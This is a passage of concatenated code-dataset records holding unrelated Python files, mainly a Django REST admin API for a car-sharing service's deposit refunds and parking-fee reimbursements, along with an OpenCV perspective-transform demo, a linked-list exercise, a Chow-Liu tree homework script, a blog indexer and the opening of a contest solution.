rest_framework.generics import get_object_or_404\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom customer.utils import TransferStatus, save_parking_fee_withdraw_success_data, \\\n save_parking_fee_withdraw_unknow_data\nfrom deposit.models import MemberDepositRecord\nfrom operation.app_push_template import AppPushTemplate\nfrom operation.models import MemberDuesRecord, AccountRecord, Customer\nfrom order.models import ParkingFee, Order\nfrom permission.permissions import CanConfirmDeposit, DepositOperation, \\\n CanReturnDeposit, \\\n DueOperation, CanCheckParkingFee, ParkingFeeOperation\nfrom wechat.helpers import transfer_to_wechat\nfrom wechat.message_template import TO_DO_REMIND\nfrom wechat.message_template_data import apply_parking_fee_fail\nfrom wechat.tasks import send_template_msg\nfrom wechat.wechat_msg_utils import get_user_info, UseCarAccountChangeType, \\\n sent_account_changed_msg, AccountDescType, send_parking_fee_apply_pass_msg, Target\nfrom zerocar.utils import date_str_to_timestamp, Sources, ExportMixin, \\\n date_str_to_date, save_app_push_msg, to_cent, DepositGrades\nfrom .serializers import DepositRecordSerializer, DuesRecordSerializer, \\\n ParkingFeeSerializer, \\\n ParkingFeeVASerializer, \\\n DepositRecordVASerializer, BatchDepositRecordSerializer, \\\n BatchPayDepositRecordSerializer\n\nlogger = logging.getLogger('zerocar')\n\n\nclass DepositApiSet(ExportMixin, mixins.ListModelMixin, mixins.RetrieveModelMixin,\n viewsets.GenericViewSet):\n \"\"\"\n list:\n 会员违章预缴金记录列表,搜索条件:申请起止时间用start、end指定,确认起止时间用ck_stime、ck_etime指定\n read:\n 会员违章预缴金详情\n delete:\n 删除会员违章预缴金记录\n export:\n 导出excel文件\n \"\"\"\n permission_classes = (DepositOperation, )\n serializer_class = DepositRecordSerializer\n search_fields = ('customer__nick_name', 'customer__member__real_name', 'customer__mobile',\n 'trade_record__trade_code', 'trade_record__trade_sn')\n filter_fields = ('state', 'client')\n export_param = dict(\n fields=('real_name', 'mobile', 'amount', 'created_at', 'state_name', 'return_pay_at',\n 'return_amount', 'member_memo', 'pay_at', 'trade_code', 'trade_sn',\n 'apply_return_at', 'mod_amount', 'mod_desc', 'confirm_at', 'client_description',\n 'trade_account_type_name'),\n headers=('姓名', '手机号', '金额', '创建时间', '状态', '退还支付时间', '退还金额', '会员备注', '违章预缴金缴纳时间', '交易单号',\n '第三方平台交易号', '申请退还违章预缴金时间', '扣款金额(元)', '扣款描述', '退还确认时间', '来源', '支付来源'))\n\n def get_queryset(self):\n filters = dict()\n start_timestamp = date_str_to_timestamp(self.request.query_params.get('start'))\n end_timestamp = date_str_to_timestamp(self.request.query_params.get('end'), end_of_day=True)\n ck_start_timestamp = date_str_to_timestamp(self.request.query_params.get('ck_stime'))\n ck_end_timestamp = date_str_to_timestamp(\n self.request.query_params.get('ck_etime'), end_of_day=True)\n grade_type = self.request.query_params.get('grade_type')\n\n try:\n grade_type = int(grade_type)\n except (TypeError, ValueError):\n grade_type = None\n\n if grade_type == DepositGrades.LEVEL1:\n filters['amount'] = settings.DEPOSIT_LV1\n elif grade_type == DepositGrades.LEVEL2:\n filters['amount'] = settings.DEPOSIT_LV2\n elif grade_type == DepositGrades.UPGRADE:\n filters['amount'] = settings.UPGRADE_DEPOSIT\n\n if start_timestamp:\n filters['apply_return_time__gte'] = start_timestamp\n if end_timestamp:\n filters['apply_return_time__lte'] = end_timestamp\n if ck_start_timestamp:\n filters['ck_time__gte'] = ck_start_timestamp\n if ck_end_timestamp:\n filters['ck_time__lte'] = ck_end_timestamp\n\n return MemberDepositRecord.objects.all().select_related(\n 'customer__member', 'trade_record').filter(**filters).order_by('-id')\n\n\nclass DuesRecordApiSet(ExportMixin, mixins.ListModelMixin, mixins.RetrieveModelMixin,\n viewsets.GenericViewSet):\n \"\"\"\n list:\n 会员会费记录列表,搜索条件:起止时间用start、end指定\n read:\n 会员会费记录详情\n delete:\n 删除会员会费记录\n export:\n 导出excel文件\n \"\"\"\n permission_classes = (DueOperation, )\n serializer_class = DuesRecordSerializer\n search_fields = ('customer__nick_name', 'customer__mobile', 'service_city__area_name')\n filter_fields = ('state', 'client')\n export_param = dict(\n fields=('nick_name', 'mobile', 'amount', 'city_name', 'created_at', 'pay_name',\n 'grade_name', 'member_sdate', 'member_edate', 'real_name', 'client_description'),\n headers=('昵称', '手机号', '金额', '城市', '会费缴纳时间', '支付方式', '会员等级', '会员开始时间', '会员结束时间', '真实姓名',\n '来源'))\n\n def get_queryset(self):\n filters = dict()\n start_timestamp = date_str_to_timestamp(self.request.query_params.get('start'))\n end_timestamp = date_str_to_timestamp(self.request.query_params.get('end'), end_of_day=True)\n if start_timestamp:\n filters['cr_time__gte'] = start_timestamp\n if end_timestamp:\n filters['cr_time__lte'] = end_timestamp\n\n return MemberDuesRecord.objects.all().select_related(\n 'customer', 'service_city').filter(**filters).order_by('-id')\n\n\nclass ParkingFeeFilter(filters.FilterSet):\n # 对停车费报销记录创建时间进行筛选\n start = filters.DateFilter(name=\"cr_time\", lookup_expr='gte')\n min_amount = filters.NumberFilter(name='amounts', lookup_expr='gte')\n max_amount = filters.NumberFilter(name='amounts', lookup_expr='lte')\n\n class Meta:\n model = ParkingFee\n fields = ('start', 'state', 'order__trip__start_car_outlet', 'order__order_type',\n 'min_amount', 'max_amount', 'target')\n\n\nclass ParkingFeeApiSet(ExportMixin, mixins.ListModelMixin, mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin, viewsets.GenericViewSet):\n \"\"\"\n list:\n 会员停车费报销记录列表,搜索条件:起止时间用start、end指定\n read:\n 停车报销记录详情\n update:\n 修改停车报销记录的备注\n export:\n 导出excel文件\n \"\"\"\n permission_classes = (ParkingFeeOperation, )\n serializer_class = ParkingFeeSerializer\n search_fields = ('order__order_no', 'order__user_mobile', 'order__user_real_name',\n 'order__car_number', 'order__s_addr', 'order__e_addr', 'order__user_nick_name',\n 'op_source', 'op_user')\n filter_class = ParkingFeeFilter\n export_param = dict(\n fields=('real_name', 'mobile', 'service_city_name', 'state_name', 'amounts', 'car_number',\n 'co_name_s', 'co_name_e', 'last_order_time_diff', 'order_start_time',\n 'order_trip_mileage', 'memo', 'cr_time', 'target_name'),\n headers=('姓名', '手机号', '城市', '状态', '金额', '车牌号', '开始网点', '结束网点', '与上次订单时间差', '订单时间', '行驶里程',\n '备注', '申请时间', '报销账户'))\n\n def get_queryset(self):\n queryset = ParkingFee.objects.all().select_related('order__trip').order_by('-cr_time')\n end = self.request.query_params.get('end')\n end = date_str_to_date(end)\n if end:\n queryset = queryset.filter(cr_time__lte=end + timedelta(days=1))\n\n return queryset\n\n def get_serializer_context(self):\n return self.request.query_params\n\n\nclass ApplyParkingFee(generics.GenericAPIView):\n \"\"\"\n 审核停车费报销的操作,参数op(0: 不通过,1:报销), amounts, op_desc\n \"\"\"\n serializer_class = ParkingFeeVASerializer\n permission_classes = (CanCheckParkingFee, )\n\n class Ops:\n PASS = 1\n FAIL = 0\n\n names = {PASS: '允准报销', FAIL: '不通过'}\n\n @transaction.atomic\n def post(self, request, id_):\n parking_fee = get_object_or_404(ParkingFee, pk=id_)\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n if parking_fee.state in (ParkingFee.States.DELETED, ParkingFee.States.REIMBURSED):\n return Response('已删除和已报销状态记录不能操作', status.HTTP_412_PRECONDITION_FAILED)\n op = serializer.validated_data['op']\n amounts = serializer.validated_data.get('amounts', 0)\n op_desc = serializer.validated_data.get('op_desc')\n state = parking_fee.state\n if op == ApplyParkingFee.Ops.PASS and state != ParkingFee.States.APPLIED:\n return Response('非申请状态的记录不能报销', status.HTTP_412_PRECONDITION_FAILED)\n parking_fee.amounts = amounts\n parking_fee.op_time = datetime.now()\n parking_fee.op_source = Sources.BONUS_INCOME\n parking_fee.op_user = request.user.username\n parking_fee.op_desc = op_desc\n\n if op == ApplyParkingFee.Ops.FAIL:\n parking_fee.state = ParkingFee.States.REJECTED\n parking_fee.last_operator = request.user\n parking_fee.save()\n # 停车费报销未通过模板消息\n customer = parking_fee.order.customer\n wx_msg = apply_parking_fee_fail(get_user_info(customer), parking_fee)\n if settings.ENVIRONMENT != 'DEVELOPMENT':\n send_template_msg.delay(customer.wx_openid, TO_DO_REMIND, wx_msg)\n # 推送app消息: 停车费报销未通过\n save_app_push_msg(AppPushTemplate.parking_fee_apply_fail(parking_fee), customer)\n elif op == ApplyParkingFee.Ops.PASS:\n # 允准报销 需要处理会员的账户可以余额\n customer = Customer.objects.select_related('member').select_for_update().get(\n id=parking_fee.order.customer_id)\n cr_time = int(datetime.now().timestamp())\n parking_fee.last_operator = request.user\n if parking_fee.target == ParkingFee.Targets.CASH_ACCOUNT:\n AccountRecord(\n customer=customer,\n account_type=AccountRecord.AccountType.CASH,\n cr_time=cr_time,\n source_id=parking_fee.order.pk,\n accinout_type=AccountRecord.AccinoutType.PARKING_FEE,\n amount=amounts,\n source_type=Sources.ORDER,\n desc='报销停车费',\n last_operator=request.user).save()\n parking_fee.state = ParkingFee.States.REIMBURSED\n parking_fee.save()\n customer.member.cash_account += amounts\n customer.member.save()\n # 停车费报销通过发送用车余额变动通知模板消息\n sent_account_changed_msg(AccountDescType.CASH, amounts,\n UseCarAccountChangeType.PARKING_FEE, customer, cr_time)\n # 发送微信消息\n send_parking_fee_apply_pass_msg(customer, Target.CASH, amounts, cr_time)\n # 推送app消息: 停车费报销通过通知\n save_app_push_msg(AppPushTemplate.parking_fee_apply_success(parking_fee), customer)\n\n elif parking_fee.target == ParkingFee.Targets.WECHAT:\n amount = int(amounts * 100)\n desc = '停车费报销至微信零钱'\n partner_trade_no = f'{int(time.time()*1000000)}888{\"%07d\"% customer.id}'\n transfer_msg = transfer_to_wechat(customer.wx_openid, amount, desc,\n partner_trade_no, customer)\n transfer_result, transfer_data = transfer_msg['result'], transfer_msg[\n 'transfer_data']\n amount = Decimal(amount / 100)\n if transfer_result == TransferStatus.SUCCESS:\n save_parking_fee_withdraw_success_data(parking_fee, amount, transfer_data,\n partner_trade_no, request.user)\n\n # 发送微信消息\n send_parking_fee_apply_pass_msg(customer, Target.WECHAT, amount, cr_time)\n # 推送app消息: 停车费报销通过通知\n save_app_push_msg(\n AppPushTemplate.parking_fee_apply_success(parking_fee), customer)\n return Response(transfer_msg)\n elif transfer_result == TransferStatus.FAIL:\n logger.info(f'[停车费报销至微信零钱失败] 原因:{transfer_data},'\n f'用户[{customer.id}]报销{amount}元,订单号:{partner_trade_no}')\n return Response(transfer_msg)\n else:\n try:\n query_transfer_result = transfer_msg['transfer_data'][\n 'query_transfer_result']\n except Exception:\n query_transfer_result = {'detail_id': ''}\n\n save_parking_fee_withdraw_unknow_data(customer, amount, query_transfer_result,\n partner_trade_no)\n logger.info(f'[停车费报销至微信零钱失败结果待查询] 原因:{transfer_data},'\n f'用户[{customer.id}]报销{amount}元,订单号:{partner_trade_no}')\n return Response(transfer_msg)\n\n elif parking_fee.target == ParkingFee.Targets.BONUS_ACCOUNT:\n AccountRecord.objects.create(\n customer=customer,\n account_type=AccountRecord.AccountType.BONUS,\n cr_time=cr_time,\n source_id=parking_fee.order.pk,\n accinout_type=AccountRecord.AccinoutType.PARKING_FEE,\n amount=amounts,\n source_type=Sources.ORDER,\n desc='报销停车费',\n last_operator=request.user)\n parking_fee.state = ParkingFee.States.REIMBURSED\n parking_fee.save()\n customer.member.bonus_account += amounts\n customer.member.save()\n # 停车费报销通过发送红包余额变动通知模板消息\n sent_account_changed_msg(AccountDescType.RED_ENVELOPE, amounts,\n UseCarAccountChangeType.PARKING_FEE, customer, cr_time)\n # 发送微信消息\n send_parking_fee_apply_pass_msg(customer, Target.BONUS, amounts, cr_time)\n # 推送app消息: 停车费报销通过通知\n save_app_push_msg(AppPushTemplate.parking_fee_apply_success(parking_fee), customer)\n else:\n raise exceptions.ValidationError({'detail': '非法的报销target'})\n\n return Response('success')\n\n\nclass ConfirmReturnDeposit(generics.GenericAPIView):\n \"\"\"\n 确认退还违章预缴金申请的操作,参数 mod_amount\n \"\"\"\n serializer_class = DepositRecordVASerializer\n permission_classes = (CanConfirmDeposit, )\n\n @transaction.atomic\n def post(self, request, id_):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n deposit_record = get_object_or_404(MemberDepositRecord, pk=id_)\n\n un_finish_order = Order.objects.filter(customer__id=deposit_record.customer.id).exclude(\n state=Order.States.FINISH)\n\n if deposit_record.grade_type == DepositGrades.UPGRADE:\n un_finish_order = un_finish_order.filter(\n day_rent_set_menu__deposit_level=DepositGrades.LEVEL2)\n\n if un_finish_order.exists():\n return Response('该用户存在未完成的订单', status.HTTP_412_PRECONDITION_FAILED)\n if deposit_record.state != MemberDepositRecord.States.APPLY_RETURN:\n return Response('非退款申请状态不允许确认', status.HTTP_412_PRECONDITION_FAILED)\n\n mod_amount = serializer.validated_data.get('mod_amount', 0)\n if mod_amount > deposit_record.amount:\n return Response('扣款金额大于违章预缴金金额', status.HTTP_412_PRECONDITION_FAILED)\n\n if deposit_record.grade_type == DepositGrades.LEVEL1 and \\\n MemberDepositRecord.objects.curr_up(state=MemberDepositRecord.States.APPLY_RETURN,\n customer=deposit_record.customer).exists():\n return Response('该用户有两笔退款申请,请先操作%s的退款确认' % to_cent(settings.UPGRADE_DEPOSIT),\n status.HTTP_412_PRECONDITION_FAILED)\n\n deposit_record.mod_amount = mod_amount\n deposit_record.return_amount = deposit_record.amount - mod_amount\n deposit_record.state = MemberDepositRecord.States.CONFIRMED\n deposit_record.return_op_user_id = request.user.id\n deposit_record.ck_time = int(datetime.now().timestamp())\n deposit_record.last_operator = request.user\n deposit_record.save()\n return Response('success')\n\n\nclass BatchConfirmReturnDeposit(generics.GenericAPIView):\n \"\"\"\n 批量确认退还违章预缴金申请的操作 参数ids,需要批量操作的违章预缴金记录id数组\n \"\"\"\n serializer_class = BatchDepositRecordSerializer\n permission_classes = (CanConfirmDeposit, )\n\n @transaction.atomic\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n deposit_records = serializer.validated_data['ids']\n\n errors = self.check_errors(deposit_records)\n\n if errors:\n return Response(','.join(errors.values()), status.HTTP_412_PRECONDITION_FAILED)\n\n for deposit_record in deposit_records:\n deposit_record.return_amount = deposit_record.amount\n deposit_record.state = MemberDepositRecord.States.CONFIRMED\n deposit_record.return_op_user_id = request.user.id\n deposit_record.ck_time = int(datetime.now().timestamp())\n deposit_record.last_operator = request.user\n deposit_record.save()\n return Response('success')\n\n @staticmethod\n def check_errors(deposit_records):\n errors = {}\n for deposit_record in deposit_records:\n un_finish_order = Order.objects.filter(customer__id=deposit_record.customer.id).exclude(\n state=Order.States.FINISH)\n\n if deposit_record.grade_type == DepositGrades.UPGRADE:\n un_finish_order = un_finish_order.filter(\n day_rent_set_menu__deposit_level=DepositGrades.LEVEL2)\n\n customer = deposit_record.customer\n if not un_finish_order.exists():\n if deposit_record.grade_type == DepositGrades.LEVEL1 and \\\n MemberDepositRecord.objects.curr_up(customer=deposit_record.customer,\n state=MemberDepositRecord.States.APPLY_RETURN).exists():\n errors[customer.mobile] = '用户: %s [%s] 有两笔退款申请,请先操作%s的退款确认!' % \\\n (customer.nick_name, customer.mobile, to_cent(settings.UPGRADE_DEPOSIT))\n continue\n else:\n order = un_finish_order.first()\n errors[customer.mobile] = '用户: %s [%s] 有 %s 订单,无法确认!' % (\n customer.nick_name, customer.mobile, order.get_state_display())\n return errors\n\n\n# 保证金支付退款验证\ndef check_pay_deposit_error(deposit_record):\n errors, prefix = [], '用户: %s [%s]' % (deposit_record.customer.nick_name,\n deposit_record.customer.mobile)\n if deposit_record.state != MemberDepositRecord.States.CONFIRMED:\n errors.append('%s 非确认状态不允许付款' % prefix)\n\n if deposit_record.mod_amount is not None and \\\n deposit_record.mod_amount > deposit_record.amount:\n errors.append('%s 扣款金额大于违章预缴金金额' % prefix)\n\n if deposit_record.grade_type == DepositGrades.LEVEL1 and \\\n MemberDepositRecord.objects.curr_up(state=MemberDepositRecord.States.CONFIRMED,\n customer=deposit_record.customer).exists():\n errors.append('%s 有两笔退款待付记录,请先操作%s的退款确认' % (prefix, to_cent(settings.UPGRADE_DEPOSIT)))\n\n return errors\n\n\ndef _confirm_return_deposit(op_user, deposit_records, validated_data):\n deposit_records.update(\n pay_type=validated_data['pay_type'],\n return_pay_time=int(datetime.now().timestamp()),\n state=MemberDepositRecord.States.FINISH_RETURN,\n mod_desc=validated_data.get('mod_desc'),\n return_op_user_id=op_user.id,\n return_op_source=1,\n is_curr=0,\n last_operator=op_user)\n\n\nclass PayDeposit(generics.GenericAPIView):\n \"\"\"\n 付款操作 member_deposit_return_pay\n 参数 return_pay_type,mod_desc\n \"\"\"\n serializer_class = DepositRecordVASerializer\n permission_classes = (CanReturnDeposit, )\n\n def post(self, request, id_):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n deposit_record = get_object_or_404(MemberDepositRecord, pk=id_)\n\n errors = check_pay_deposit_error(deposit_record)\n if errors:\n return Response(errors[0], status.HTTP_412_PRECONDITION_FAILED)\n\n deposit_records = MemberDepositRecord.objects.filter(id=deposit_record.id)\n _confirm_return_deposit(request.user, deposit_records, serializer.validated_data)\n return Response('success')\n\n\nclass CancelConfirmReturnDeposit(generics.GenericAPIView):\n \"\"\"\n 取消已经确认退还违章预缴金申请的操作\n \"\"\"\n serializer_class = DepositRecordVASerializer\n\n @transaction.atomic\n def post(self, request, id_):\n deposit_record = get_object_or_404(MemberDepositRecord, pk=id_)\n if deposit_record.state != MemberDepositRecord.States.CONFIRMED:\n return Response('非确认状态不允许取消确认', status.HTTP_412_PRECONDITION_FAILED)\n else:\n deposit_record.state = MemberDepositRecord.States.APPLY_RETURN\n deposit_record.save()\n return Response('success')\n\n\nclass BatchPayDeposit(generics.GenericAPIView):\n \"\"\"违章预缴金,批量付款\"\"\"\n serializer_class = BatchPayDepositRecordSerializer\n permission_classes = (CanConfirmDeposit, )\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n deposit_records = serializer.validated_data['ids']\n for deposit_record in deposit_records:\n errors = check_pay_deposit_error(deposit_record)\n if errors:\n return Response(errors[0], status.HTTP_412_PRECONDITION_FAILED)\n\n for d in deposit_records:\n d.pay_type = serializer.validated_data['pay_type']\n d.return_pay_time = int(datetime.now().timestamp())\n d.state = MemberDepositRecord.States.FINISH_RETURN\n d.mod_desc = serializer.validated_data.get('mod_desc')\n d.return_op_user_id = request.user.id\n d.return_op_source = 1\n d.is_curr = 0\n d.last_operator = request.user\n d.save()\n\n return Response('success')\n\n\nclass CurrentCarOrderList(APIView):\n def get(self, request):\n parking_fee_id = self.request.query_params.get('parking_fee_id')\n parking_fee = get_object_or_404(ParkingFee, pk=parking_fee_id)\n car = parking_fee.order.car\n order_ids = list(Order.objects.filter(car=car).order_by('-id').values_list('id', flat=True))\n index = order_ids.index(parking_fee.order.id) + 1\n limit = int(self.request.query_params.get('limit', 20))\n data = {\n 'car_id': car.id,\n 'limit': limit,\n 'page': index // limit + 1,\n 'index': index % limit\n }\n return Response(data)\n","sub_path":"simplegit/zerocar-master/deposit/rest/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":25165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"67029143","text":"#coding=utf-8\n\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n#仿射变换\n# 原图中所有的平行线在结果图像中同样平行。为了创建这\n# 个矩阵我们需要从原图像中找到三个点以及他们在输出图像中的位置。\nimg = cv2.imread('D:\\\\DevN\\\\sample-data\\\\images\\\\football\\\\messi5.jpg',3)\nrows,cols,ch = img.shape\n#\n# 在仿射变换中,原图中所有的平行线在结果图像中同样平行。为了创建这\n# 个矩阵我们需要从原图像中找到三个点以及他们在输出图像中的位置。然后\n# cv2.getAffineTransform 会创建一个2x3 的矩阵,最后这个矩阵会被传给\n# 函数cv2.warpAffine。\n\n# pts1 = np.float32([[50,50],[200,50],[50,200]])\n# pts2 = np.float32([[10,100],[200,50],[100,250]])\n#\n# M = cv2.getAffineTransform(pts1,pts2)\n#\n# dst = cv2.warpAffine(img,M,(cols,rows))\n\n########################################\n# 对于视角变换,我们需要一个3x3 变换矩阵.\n# 在变换前后直线还是直线。\n# 要构建这个变换矩阵,你需要在输入图像上找4 个点,以及他们在输出图\n# 像上对应的位置。这四个点中的任意三个都不能共线。这个变换矩阵可以有\n# 函数cv2.getPerspectiveTransform() 构建。然后把这个矩阵传给函数\n# cv2.warpPerspective\n\npts1 = np.float32([[56,65],[368,52],[28,387],[389,390]])\npts2 = np.float32([[0,0],[300,0],[0,300],[300,300]])\nM=cv2.getPerspectiveTransform(pts1,pts2)\ndst=cv2.warpPerspective(img,M,(300,300))\n\nplt.subplot(121),plt.imshow(img),plt.title('Input')\nplt.subplot(122),plt.imshow(dst),plt.title('Output')\nplt.show()","sub_path":"core.framework.datamining.pyscript/openvc2/image-rotation-draw.py","file_name":"image-rotation-draw.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"420104971","text":"#!/usr/bin/python3\n\"\"\"Defines a singly linked list\"\"\"\n\n\nclass Node():\n \"\"\"Class that defines a node\"\"\"\n\n def __init__(self, data, next_node=None):\n \"\"\"Method for initialize a Node object.\n Args:\n data(int): Integer to insert inside the store inside node.\n next_node(Atributte): Atributte that store a Node object.\n Returns:\n Always nothing.\n \"\"\"\n self.data = data\n self.next_node = next_node\n\n @property\n def data(self):\n \"\"\"Getter of data.\n Args:\n Any Arguments.\n Returns:\n The current value of data.\n \"\"\"\n return self.__data\n\n @data.setter\n def data(self, value):\n \"\"\"Setter of data.\n Args:\n value(int): Integer store inside node.\n Return:\n Always nothing.\n \"\"\"\n if isinstance(value, int) is not True:\n raise TypeError('data must be an integer')\n else:\n self.__data = value\n\n @property\n def next_node(self):\n \"\"\"Getter of next_node.\n Args:\n Any Arguments.\n Returns:\n The current value of data.\n \"\"\"\n return self.__next_node\n\n @next_node.setter\n def next_node(self, value):\n \"\"\"Setter of next_node.\n Args:\n value(atributte): Atributte that store a Node object.\n Return:\n Always nothing.\n \"\"\"\n if type(value) is not Node and value is not None:\n raise TypeError('next_node must be a Node object')\n self.__next_node = value\n\n\nclass SinglyLinkedList():\n \"\"\"Class that defines a singly linked list\"\"\"\n\n def __init__(self):\n \"\"\"Method for initialize a single list object with head.\n Args:\n Any arguments.\n Returns:\n Always nothing.\n \"\"\"\n self.__head = None\n\n def sorted_insert(self, value):\n \"\"\"Method to manage a insert new node into the list.\n Args:\n value(data): Integer to store inside node.\n Returns:\n Always nothing.\n \"\"\"\n new_node = Node(value, None)\n tmp = self.__head\n if self.__head is None:\n self.__head = new_node\n elif value <= self.__head.data:\n new_node.next_node = self.__head\n self.__head = new_node\n else:\n while tmp.next_node and value > tmp.next_node.data:\n tmp = tmp.next_node\n new_node.next_node = tmp.next_node\n tmp.next_node = new_node\n\n def __str__(self):\n \"\"\"Method to print Square instance.\n Args:\n No Arguments\n Return:\n \"\"\"\n node_data = \"\"\n if self.__head is None:\n return \"\"\n else:\n tmp = self.__head\n while tmp is not None:\n node_data += str(tmp.data) + \"\\n\"\n tmp = tmp.next_node\n return node_data[:-1]\n","sub_path":"0x06-python-classes/100-singly_linked_list.py","file_name":"100-singly_linked_list.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"217654527","text":"import numpy as np\nimport pandas as pd\n\n# original line - from sol import utils\n# I changed it to\nimport util\n# todo change back?\nimport vis\nfrom scipy.sparse.csgraph import minimum_spanning_tree\n\n########## add code ##########\nfrom itertools import combinations, permutations\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse.csgraph import minimum_spanning_tree\nfrom collections import Counter, defaultdict\n##############################\n\n\nnp.set_printoptions(precision=4)\npd.set_option('precision', 2)\n\n\ndef get_probs(image_to_labels):\n is_in_prob, both_in_prob = defaultdict(int), defaultdict(int)\n num_samples = len(image_to_labels)\n class_id2ind = dict()\n num_classes = 0\n for labels in image_to_labels.values():\n for label in labels:\n if label not in class_id2ind:\n class_id2ind[label] = num_classes\n num_classes += 1\n is_in_prob[class_id2ind[label]] += 1 / num_samples\n for l1, l2 in combinations(labels, 2):\n ind1 = min(class_id2ind[l1], class_id2ind[l2])\n ind2 = max(class_id2ind[l1], class_id2ind[l2])\n both_in_prob[(ind1, ind2)] += 1 / num_samples\n\n one_in_one_out_prob = defaultdict(int)\n both_out_prob = defaultdict(int)\n for ind1, ind2 in both_in_prob: # todo is this correct?\n one_in_one_out_prob[(ind1, ind2)] = is_in_prob[ind1] - both_in_prob[(ind1, ind2)]\n one_in_one_out_prob[(ind2, ind1)] = is_in_prob[ind2] - both_in_prob[(ind1, ind2)]\n both_out_prob[(ind1, ind2)] = 1 - (is_in_prob[ind1] + is_in_prob[ind2] - both_in_prob[(ind1, ind2)])\n\n return is_in_prob, both_out_prob, one_in_one_out_prob, both_in_prob, class_id2ind\n\n\ndef get_single_mutual_info(mutual, s1, s2):\n if mutual == 0:\n return 0\n return mutual * np.log(mutual / (s1 * s2))\n\n\ndef get_minus_mutual_info(is_in_prob, both_out_prob, one_in_one_out_prob, both_in_prob, class_id2ind):\n num_classes = len(is_in_prob)\n mutual_info = np.zeros((len(class_id2ind), len(class_id2ind)))\n for ind1, ind2 in both_in_prob: # todo is this correct?\n c_00 = get_single_mutual_info(both_out_prob[(ind1, ind2)], 1 - is_in_prob[ind1], 1 - is_in_prob[ind2])\n c_10 = get_single_mutual_info(one_in_one_out_prob[(ind1, ind2)], is_in_prob[ind1], 1 - is_in_prob[ind2])\n c_01 = get_single_mutual_info(one_in_one_out_prob[(ind2, ind1)], is_in_prob[ind2], 1 - is_in_prob[ind1])\n c_11 = get_single_mutual_info(both_in_prob[(ind1, ind2)], is_in_prob[ind1], is_in_prob[ind2])\n summ = c_00 + c_01 + c_10 + c_11\n mutual_info[ind1, ind2] = - summ\n return mutual_info\n\ndef main():\n vocabolary_threshold = 400\n oid_data = 'data/annotations-machine.csv'\n classes_fn = 'data/class-descriptions.csv'\n\n # Mapping between class lable and class name\n classes_display_name = util.load_display_names(classes_fn)\n\n #####################\n # ADD YOUR CODE HERE#\n #####################\n annotations = pd.read_csv(oid_data)\n image_to_labels = defaultdict(list)\n for _, row in annotations.iterrows():\n image_to_labels[row['ImageID']].append(row['LabelName'])\n\n # get Pd\n is_in_prob, both_out_prob, one_in_one_out_prob, both_in_prob, class_id2ind = get_probs(image_to_labels)\n\n # get mutual info for edges\n minus_mutual_info = get_minus_mutual_info(is_in_prob, both_out_prob, one_in_one_out_prob, both_in_prob, class_id2ind)\n\n # get spanning tree\n X = csr_matrix(minus_mutual_info)\n Tcsr = minimum_spanning_tree(X).toarray()\n ####################\n\n # Dictionary with mapping between each Node and its childern nodes.\n # use for each node the class lable\n # was before change - chow_liu_tree = dict()\n ################## change ###############\n length = Tcsr.shape[0]\n ind2class_id = {v: k for k, v in class_id2ind.items()}\n chow_liu_tree = {}\n for i, j in permutations(range(length), 2):\n if Tcsr[i, j] >= 0:\n continue\n parent = ind2class_id[i]\n child = ind2class_id[j]\n if parent not in chow_liu_tree:\n chow_liu_tree[parent] = []\n if child not in chow_liu_tree:\n chow_liu_tree[child] = []\n chow_liu_tree[parent].append(child)\n chow_liu_tree[child].append(parent)\n vis.plot_network(chow_liu_tree, classes_display_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"hw3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586249553","text":"#!/usr/bin/env python3\n\nimport os\nimport json\n\nif __name__ == \"__main__\":\n\tfp = open(\"indexer-config.json\", \"r\")\n\tindexer_config = json.load(fp)\n\tfp.close()\n\n\tnotebooks = {\"notebooks\":[]}\n\tfor notebook_name in indexer_config[\"indexed_categories\"]:\n\t\tnotebook = {\"notebook_name\": notebook_name, \"categories\": []}\n\t\tcategories = os.listdir(notebook_name)\n\t\tcategories.sort()\n\t\tfor category_name in categories:\n\t\t\tcategory = {\"category_name\": category_name, \"notes\": []}\n\t\t\tnotes = os.listdir(notebook_name + \"/\" + category_name)\n\t\t\tnotes.sort()\n\t\t\tfor note_name in notes:\n\t\t\t\tcategory[\"notes\"].append(note_name)\n\t\t\tnotebook[\"categories\"].append(category)\n\t\tnotebooks[\"notebooks\"].append(notebook)\n\t\tcurrent_path = \"\"\n\n\tindexer_out = json.dumps(notebooks, ensure_ascii=False)\n\tfp = open(\"indexed.json\", \"w\")\n\tfp.write(indexer_out)\n\tfp.close()\n","sub_path":"blog_indexer.py","file_name":"blog_indexer.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"455404380","text":"R = []\nf = open(\"input.txt\",\"r\")\nT = int(f.readline())\nfor k in range(T):\n s = str(f.readline().strip())\n n = len(s)\n i = 0\n r = 0\n while i < n and s[i] == '-':\n i += 1\n if i > 0:\n r += 1\n while i < n:\n while i < n and s[i] == '+':\n i += 1\n j = i\n while i < n and s[i] == \"-\":\n i += 1\n if j < i:\n r += 2\n R = R + [r]\n \nf.close()\nf = open(\"output.txt\",\"w\")\nfor k in range(T):\n f.write(\"Case #\"+str(k+1)+\": 